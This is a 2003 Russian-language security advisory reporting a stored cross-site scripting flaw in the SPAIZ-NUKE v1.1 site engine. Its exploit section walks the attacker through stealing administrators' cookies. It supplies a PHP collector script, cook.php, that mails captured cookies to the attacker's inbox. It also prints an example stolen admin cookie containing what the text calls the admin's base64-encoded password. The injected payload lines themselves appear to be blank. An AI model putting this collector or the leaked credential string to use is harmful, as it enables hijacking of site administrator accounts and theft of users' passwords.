__________ ___ ___
\______ \__ __ ______/ | \
| _/ | \/ ___/ _ \
| | \ | /\___ \\ /
|____|_ /____//____ >\___|_ /
-======\/==security=\/=team==\/
Advisory#9
Product: SPAIZ-NUKE v1.1
Author: sPaiZ-Nuke Group http://www.spaiz-nuke.net/ sensey@spaiz-nuke.net
Vuln: XSS
Bug found: 14.09.2003 by 1dt.w0lf
Уязвимость:
Spaiz-Nuke это движек для сайта построенный на PHP-Nuke 6.0
В движке полностью отсутствуют какие-либо проверки на теги в тексте при добавлении новостей, комментариев.
Таким образом атакующий может внедрить произвольный хтмл-код или ява-скрипт.
Эксплоит:
При добавлении комментария к статье пишем в тексте:
И при просмотре текста все посетители будут видеть надпись.
Таким же образом можно вставлять произвольные картинки и любой хтмл-текст.
Уязвимость может использоваться для получения кукисов с паролями пользователей.
В коментарии пишем:
На своем сайте надо предварительно создать файл cook.php следующего содержания:
$cookie=getenv("QUERY_STRING");
mail("ваше@мыло.ру", "O", "$cookie", "From: ip@spaiz-nuke.net\nX-Mailer: Outглюк");
?>
И при просмотре админом вашего коментария к вам на почту прийдет письмо типа:
lang=russian
admin=U2Vuc2V5OmE5MmM5YmM3MTNlNTgwYWY5MmMyZjM2YzI4ZTYwZjU4Og
где
U2Vuc2V5OmE5MmM5YmM3MTNlNTgwYWY5MmMyZjM2YzI4ZTYwZjU4Og зашифрованный base64 пароль админа
Отсутсвие проверки кода также обнаружено во всех остальных модулях этого движка.